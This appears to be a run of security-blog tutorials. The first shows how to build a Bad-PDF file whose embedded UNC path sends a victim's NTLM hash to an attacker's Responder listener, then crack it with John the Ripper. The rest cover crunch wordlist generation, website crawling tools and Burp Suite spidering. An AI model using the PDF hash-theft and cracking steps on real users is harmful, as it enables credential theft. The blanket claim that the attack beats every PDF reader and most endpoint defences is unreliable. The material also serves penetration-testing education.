Capture NTLM Hashes using PDF (Bad-Pdf)

Today we are demonstrating how to steal NTLM hashes through a PDF file. We have already discussed various methods to capture NTLM hashes in a network in our previous article. Recently a new tool, Bad-PDF, was released, and in this article we are sharing our experience with it.

Bad-PDF creates a malicious PDF to steal NTLM (NTLMv1/NTLMv2) hashes from Windows machines. It exploits a vulnerability disclosed by the Check Point research team to build the malicious PDF file, and it captures the NTLM hashes with a Responder listener.
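
Under the hood, the technique plants an automatic action in the PDF whose file entry points at an attacker-controlled UNC path; when the reader dereferences that path, Windows transparently attempts SMB authentication and leaks the NTLM hash to the listener. The snippet below is a simplified sketch of such an action dictionary (the IP address is a placeholder, and the exact objects Bad-PDF writes may differ):

/AA <<
  /O <<
    /F (\\\\192.168.1.109\\file)
    /D [ 0 /Fit ]
    /S /GoToE
  >>
>>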

This method works against all PDF readers (any version), no JavaScript is required for the attack, and most EDR/endpoint solutions fail to detect it.

Now run the Python script with the command given below:
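
Assuming the script keeps its upstream name, badpdf.py (check the file name in the repository you cloned), the invocation is simply:

python badpdf.py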

It will first try to launch Responder from its default path, i.e. /usr/bin/responder, but in our case Responder is located at /usr/sbin/responder. It will then ask for your network IP, the name of the output file and the interface name; supply this information as per your network.

It will then create a malicious PDF file named bad.pdf; now transfer this PDF file to your target.

So, when the victim opens our malicious file, his NTLM hash is captured, as shown in the image below. Here you can observe the username 'raj' along with its password hash. Now copy the hash value into a text document so that you can crack it and retrieve the password.

We pasted the hash value into a text file and saved it as "hash" on the desktop. We then used John the Ripper to crack the hash.

john hash

Awesome!!! We have retrieved the password 133 for the user raj.
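
If John does not identify or crack the hash automatically in your environment, you can name the format and point it at a wordlist explicitly; a sketch using Kali's default rockyou wordlist (adjust the paths to your system):

john --format=netntlmv2 --wordlist=/usr/share/wordlists/rockyou.txt hash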

Author: Aarti Singh is a Researcher and Technical Writer at Hacking Articles, an Information Security Consultant, social media lover and gadgets enthusiast. Contact here

Comprehensive Guide to Crunch Tool

Hello friends!! Today we will demonstrate how a pentester can generate his own wordlist of usernames or passwords using the powerful tool CRUNCH. In Kali Linux you can find crunch under Applications > Password Attacks > crunch.

Crunch can generate a wordlist subject to the conditions you specify, and its output file can be fed into any other program.

We are using crunch version 3.6 for this tutorial and used the parameters given below to generate wordlists.

Syntax: crunch <min-len> <max-len> [charset string] [options]

Min-len: This parameter specifies the minimum string length at which crunch starts generating the wordlist.

Max-len: This parameter specifies the maximum string length at which crunch stops.

Charset string: This parameter specifies the character set crunch draws on when generating the wordlist; if you do not specify a string, crunch falls back to its default character set of lowercase letters.

Options: crunch offers a list of options that extend its functionality so you can shape the wordlist to your requirements.

Generating wordlist without using character string

Execute the command given below, which generates a dictionary of strings of minimum length 2 and maximum length 3 using the default character set. It will start at aa and end at zzz.

crunch 2 3 -o /root/Desktop/0.txt

Here we used the following parameters to generate the dictionary:

Min-len: 2, for two-character strings

Max-len: 3, for three-character strings

-o: This option specifies the text file in which to save the output.

From the image below you can observe that it has generated 18252 lines (26^2 + 26^3 = 676 + 17576) and saved them in the 0.txt file.

Here we used the cat command to read the contents of the 0.txt file, where we can see that it starts at aa and ends at zzz, as shown in the image below.

cat /root/Desktop/0.txt
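
The first and last few lines of the file look like this:

aa
ab
ac
...
zzy
zzz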

Generating wordlist using character string

Now execute the command given below, which generates a dictionary of strings of minimum length 3 and maximum length 4 from the specified character string "raj". It will start at rrr and end at jjjj.

crunch 3 4 raj -o /root/Desktop/1.txt

From the image below you can observe that it has generated 108 lines (3^3 + 3^4 = 27 + 81) and saved them in the 1.txt file.

Now we used the cat command to read the contents of the 1.txt file, where we can see that it starts at rrr and ends at jjjj.

cat /root/Desktop/1.txt

Similarly, we can use a string of digits to build a dictionary of numeric passwords.

For example, some users set their date of birth as a password. If we would like to generate a dictionary of four-digit combinations representing a day and month, for instance 25th May as 2505, then we can use "2505" as the character string for generating a numeric wordlist.
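
Alternatively, enumerating every four-digit string covers all such day-month combinations; a sketch (the output file name is just an example):

crunch 4 4 0123456789 -o /root/Desktop/2.txt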

Generating alpha-numeric wordlist

You can generate your own alpha-numeric wordlist. Execute the command given below, which generates a dictionary of strings of minimum length 2 and maximum length 3 from the specified character string "raj123".

You can set the minimum and maximum length for your wordlist as per your requirement.

crunch 2 3 raj123 -o /root/Desktop/3.txt

Again we used the cat command to read the contents of the 3.txt file, where we can see that it contains combinations of alpha-numeric characters.

cat /root/Desktop/3.txt

Generating wordlist along with space character

The following command generates a wordlist from the string "raj" plus a trailing space character. The space has to be escaped with a backslash (note the escaped space before -o below), or equivalently the string can be wrapped in double quotes with the space inside them, as "raj ".

crunch 1 3 raj\  -o /root/Desktop/4.txt

Create wordlist using character set file of RainbowCrack

As we know, RainbowCrack ships a character set file that it uses when cracking hashes with rainbow tables; we will borrow this character set file to generate a complex wordlist as the situation demands.

cat /usr/share/rainbowcrack/charset.txt

We used the cat command to display the character sets stored in RainbowCrack's charset.txt. From the image below you can observe that it shows the following character sets:

  • numeric
  • alpha
  • alpha-numeric
  • loweralpha
  • loweralpha-numeric
  • mixalpha
  • mixalpha-numeric
  • ascii-32-95
  • ascii-32-65-123-4
  • alpha-numeric-symbol32-space

Now you can choose any of these character sets for generating a wordlist. Suppose I want to generate a wordlist of 4- to 5-character words containing lowercase letters and digits; for that I will execute the following command.

crunch 4 5 -f /usr/share/rainbowcrack/charset.txt loweralpha-numeric -o /root/Desktop/5.txt

Here -f specifies the character set file to read, followed by the name of the character set to use from it (loweralpha-numeric).

Again we used the cat command to read the contents of the 5.txt file, where we can see that it contains combinations of alpha-numeric characters.

cat /root/Desktop/5.txt

Generate wordlist with specific Pattern

Crunch provides the -t option to generate a wordlist that follows a specific pattern, as per your requirement.

With the -t option you can use four placeholder types, as specified below; a combined example follows the list:

  • Use @ for lowercase alphabetic characters
  • Use , for uppercase alphabetic characters
  • Use % for numeric characters
  • Use ^ for special characters (symbols)
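
As a combined sketch (the output file name is just an example), the following command generates six-character candidates shaped as lowercase, uppercase, digit, symbol, then two lowercase letters, e.g. aB3!xy:

crunch 6 6 -t @,%^@@ -o /root/Desktop/pattern.txt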

To generate a wordlist containing 3 numeric characters to the right of the string "raj", for instance raj123, we need to execute the following command.

Since the string raj contributes 3 letters and we want 3 more numeric characters after it, the minimum and maximum lengths should both be 6, the combined length of the string and the pattern characters.

crunch 6 6 -t raj%%% -o /root/Desktop/6.txt

Here -t specifies the pattern, in which each % is replaced by a numeric character.

Again we used the cat command to read the contents of the 6.txt file, where we can see that it contains combinations of alpha-numeric characters.

cat /root/Desktop/6.txt

Generate wordlist with Duplicate character limit

Crunch lets you limit the repetition of characters by using the -d option along with the given pattern.

As we saw above, the pattern raj%%% starts at raj000, which means a single digit may appear twice or even three times in a row; the wordlist contains words such as raj000, raj001, raj111 and raj110.

If you do not want a wordlist with such repeated digits, you can use the -d option to filter out the repetition.

For example, I want to generate a wordlist from the above pattern, raj%%%, with each digit repeating consecutively at most twice. To build such a dictionary we need to execute the command below.

crunch 6 6 -t raj%%% -d 2% -o /root/Desktop/6.1.txt

Here we used the following parameters:

-t specifies the pattern, in which each % is replaced by a numeric character.

-d 2% limits the numeric placeholders so that the same digit appears at most twice in a row.

Again we used the cat command to read the contents of the 6.1.txt file, where we can see alpha-numeric combinations in which no digit repeats more than twice consecutively.

cat /root/Desktop/6.1.txt

Now if you compare the output files 6.txt and 6.1.txt, you will notice the difference in digit repetition: raj000 and raj111 appear in 6.txt but are filtered out of 6.1.txt, while raj001, with only two consecutive zeros, survives.

Generate wordlist with Pattern for uppercase letter

To generate a wordlist containing 3 uppercase characters to the right of the string "raj", for instance rajABC, we need to execute the following command.

Since the string raj contributes 3 letters and we want 3 more uppercase letters after it, the minimum and maximum lengths should again both be 6.

crunch 6 6 -t raj,,, -o /root/Desktop/7.txt

Here -t specifies the pattern, in which each comma (,) is replaced by an uppercase letter.

Again we used the cat command to read the contents of the 7.txt file, where we can see that it contains mixed-case alphabetic combinations.

cat /root/Desktop/7.txt

Similarly, we can limit uppercase letter repetition as we did above. If I do not want any letter to appear twice in a row, I can execute the command given below to generate such a dictionary.

crunch 6 6 -t raj,,, -d 1, -o /root/Desktop/7.1.txt

-t specifies the pattern, in which each comma (,) is replaced by an uppercase letter.

-d 1, limits the uppercase placeholders so that the same letter appears at most once in a row, i.e. never twice consecutively.

Again we used the cat command to read the contents of the 7.1.txt file, where we can see mixed-case combinations in which no uppercase letter repeats consecutively.

cat /root/Desktop/7.1.txt

Now if you compare the output files 7.txt and 7.1.txt, you will notice the difference in letter repetition.

Use Permutation for generating wordlist

The -p option generates a wordlist using permutations; with it, crunch ignores the minimum and maximum length values, although they must still be supplied on the command line. It can be used with a single string or with multiple words, as shown below.

crunch 3 6 -p raj chandel hackingarticles

From the image below you can analyse the output and see the permutations generated: three words yield 3! = 6 permutations.
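
Concretely (the exact ordering may vary), the six lines are the six possible word orders concatenated together:

chandelhackingarticlesraj
chandelrajhackingarticles
hackingarticleschandelraj
hackingarticlesrajchandel
rajchandelhackingarticles
rajhackingarticleschandel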

Generate Dictionary with limited words

If you look at all the output above, you will see that crunch reports the number of lines for each dictionary it generates. For instance, the text file 0.txt has 18252 lines, and each line contains exactly one word.

So if you wish to cap the number of lines generated, use the -c option as in the command below.

crunch 5 5 IGNITE -c 25 -o /root/Desktop/8.txt

It will generate a dictionary of only 25 words and save the output in 8.txt.

Again we used the cat command to read the contents of the 8.txt file, where we can see that it contains only 25 words.

cat /root/Desktop/8.txt

Wordlist Fragmentation

Use the -b option for wordlist fragmentation, which splits a single wordlist into multiple smaller ones. It is quite a useful option when dividing a wordlist: one that is gigabytes in size can be broken into megabyte-sized pieces.

crunch 5 7 raj@123 -b 3mb -o START

From the image below you can observe that it has divided a 7 MB wordlist into three text files; crunch names each chunk after the first and last words it contains.

Generate compressed Dictionary

Crunch lets you generate a compressed wordlist with the -z option, which takes gzip, bzip2, lzma or 7z as the compression format. Execute the command given below for compression.

crunch 5 7 raj@123 -z gzip -o START

From the image below you can observe that it has generated a compressed text file.

Author: Aarti Singh is a Researcher and Technical Writer at Hacking Articles, an Information Security Consultant, social media lover and gadgets enthusiast. Contact here

5 Ways to Crawl a Website

From Wikipedia

A Web crawler, sometimes called a spider, is an Internet bot that systematically browses the World Wide Web, typically for the purpose of Web indexing.

A Web crawler starts with a list of URLs to visit, called the seeds. As the crawler visits these URLs, it identifies all the hyperlinks in the page and adds them to the list of URLs to visit. If the crawler is archiving websites, it copies and saves the information as it goes. The archive is known as the repository and is designed to store and manage the collection of web pages. A repository is similar to any other system that stores data, like a modern-day database.
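
Before looking at the five tools, here is a minimal command-line illustration of that seed-and-follow loop using wget (the depth and output directory are just a sketch): it fetches the seed page, extracts its links, and follows them recursively up to the given depth.

wget -r -l 2 -P /root/Desktop/tptl http://tptl.in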

Let’s Begin!!

Metasploit

This auxiliary module is a modular web crawler, to be used in conjunction with wmap (someday) or standalone.

use auxiliary/crawler/msfcrawler

msf auxiliary(msfcrawler) > set rhosts www.example.com

msf auxiliary(msfcrawler) > exploit

From the screenshot you can see it has loaded the crawler in order to extract hidden files from the website, for example about.php, the jQuery contact form, HTML files and so on, which cannot be extracted manually from the website using a browser. We can use it for information gathering on any website.

HTTRACK

HTTrack is a free and open-source Web crawler and offline browser, developed by Xavier Roche.

It allows you to download a World Wide Web site from the Internet to a local directory, recursively building all directories and getting HTML, images and other files from the server onto your computer. HTTrack preserves the original site's relative link structure.

Type the following command inside the terminal:

httrack http://tptl.in -O /root/Desktop/file

It will save the output inside the given directory, /root/Desktop/file.

From the given screenshot you can observe that it has dumped the website information inside that directory, consisting of HTML files as well as JavaScript and jQuery.

Black Widow

This Web spider utility detects and displays detailed information for a user-selected Web page, and it offers other Web page tools.

BlackWidow’s clean, logically tabbed interface is simple enough for intermediate users to follow but offers just enough under the hood to satisfy advanced users. Simply enter your URL of choice and press Go. BlackWidow uses multithreading to quickly download all files and test the links. The operation takes only a few minutes for small Web sites.

You can download it from here.

Enter your URL, http://tptl.in, in the Address field and press Go.

Click on the Start button on the left side to begin URL scanning, and select a folder to save the output file.

From the screenshot you can observe that I browsed to C:\Users\RAJ\Desktop\tptl in order to store the output file inside it.

When you open the target folder tptl, you will get the entire data of the website; images as well as content, HTML, PHP and JavaScript files are all saved in it.

Website Ripper Copier

Website Ripper Copier (WRC) is an all-purpose, high-speed website downloader software to save website data. WRC can download website files to a local drive for offline browsing, extract website files of a certain size and type, like image, video, picture, movie and music, retrieve a large number of files as a download manager with resumption support, and mirror sites. WRC is also a site link validator, explorer, and tabbed anti pop-up Web / offline browser.

Website Ripper Copier is the only website downloader tool that can resume broken downloads from HTTP, HTTPS and FTP connections, access password-protected sites, support Web cookies, analyze scripts, update retrieved sites or files, and launch more than fifty retrieval threads.

You can download it from here.

Choose the “web sites for offline browsing” option.

Enter the website URL as http://tptl.in and click Next.

Specify the directory path where the output should be saved and click Run Now.

When you open the selected folder tp, you will find the fetched CSS, PHP, HTML and JS files inside it.

Burp Suite Spider

Burp Spider is a tool for automatically crawling web applications. While it is generally preferable to map applications manually, you can use Burp Spider to partially automate this process for very large applications, or when you are short of time.

For more detail, read our previous articles from here.

From the given screenshot you can observe that I intercepted the HTTP request for http://tptl.in; now send it to the Spider with the help of the Action tab.

The targeted website has been added to the site map under the Target tab as a new scope for web crawling. From the screenshot you can see it has started web crawling of the target website, collecting the website's content in the form of PHP, HTML and JS files.

Author: Aarti Singh is a Researcher and Technical Writer at Hacking Articles, an Information Security Consultant, social media lover and gadgets enthusiast. Contact here

How to Spider Web Applications using Burpsuite

Hello friends! Today we are doing web penetration testing using the Burp Suite Spider, which very rapidly crawls an entire web application and dumps the information of the targeted website.

Burp Spider is a tool for automatically crawling web applications. While it is generally preferable to map applications manually, you can use Burp Spider to partially automate this process for very large applications, or when you are short of time.

Source: https://portswigger.net/burp/help/spider.html

Let’s begin!!

First the attacker needs to configure the browser and the Burp proxy to work properly (Burp's default proxy listener is 127.0.0.1:8080); www.testphp.vulnweb.com will be my targeted website for enumeration.

From the screenshot given below you can see that currently there is no targeted website inside Burp Suite's site map. To add your targeted website, you need to intercept the HTTP request sent by the browser to the web application server, using the Intercept option of the Proxy tab.

Click on the Proxy tab and turn Intercept on in order to catch the HTTP request.

Here you can observe that I intercepted the HTTP request for www.testphp.vulnweb.com; now send it to the Spider with the help of the Action tab.

Confirm your action by clicking YES; Burp will alter the existing target scope to include the preferred item and all sub-items contained in the site map tree.

Now choose the Spider tab for the next step; here you will find two sub-tabs, Control and Options.

Burp Spider – Control Tab

This tab is used to start and stop Burp Spider, monitor its progress, and define the spidering scope.

Spider Status

Use these settings to monitor and control Burp Spider:

  • Spider is paused / running: This toggle button is used to start and stop the Spider. While the Spider is stopped it will not make any requests of its own, although it will continue to process responses generated via Burp Proxy (if passive spidering is enabled), and any newly-discovered items that are within the spidering scope will be queued to be requested if the Spider is restarted.
  • Clear queues: If you want to reprioritize your work, you can completely clear the currently queued items, so that other items can be added to the queue. Note that the cleared items may be re-queued if they remain in-scope and the Spider’s parser encounters new links to the items.

Spider Scope

This panel lets you define exactly what is in the scope for the Spider to request.

The best way to handle spidering scope is normally to use the suite-wide target scope, and by default the Spider will use that scope.

Burp Spider Options

This tab contains options for the basic crawler settings, passive spidering, form submission, application login, the Spider engine, and HTTP request headers.

You can monitor the status of the Spider when running, via the Control tab. Any newly discovered content will be added to the Target site map.

When spidering a selected branch of the site map, Burp will carry out the following actions (depending on your settings):

  • Request any unrequested URLs already present within the branch.
  • Submit any discovered forms whose action URLs lie within the branch.
  • Re-request any items in the branch that previously returned 304 status codes, to retrieve fresh (uncached) copies of the application’s responses.
  • Parse all content retrieved to identify new URLs and forms.
  • Recursively repeat these steps as new content is discovered.
  • Continue spidering all in-scope areas until no new content is discovered.

Hence you can see the targeted website has been added to the site map as a new scope for web crawling. Choose the "Spider this host" option by right-clicking the selected URL, which automatically starts web crawling.

When you click on the preferred target in the site map, the further content discovered by the Spider will be added inside it, as shown in the image below.

From the screenshot you can see it dumps all items of the website, even showing the request and response of the host.

Author: Aarti Singh is a Researcher and Technical Writer at Hacking Articles, an Information Security Consultant, social media lover and gadgets enthusiast. Contact here
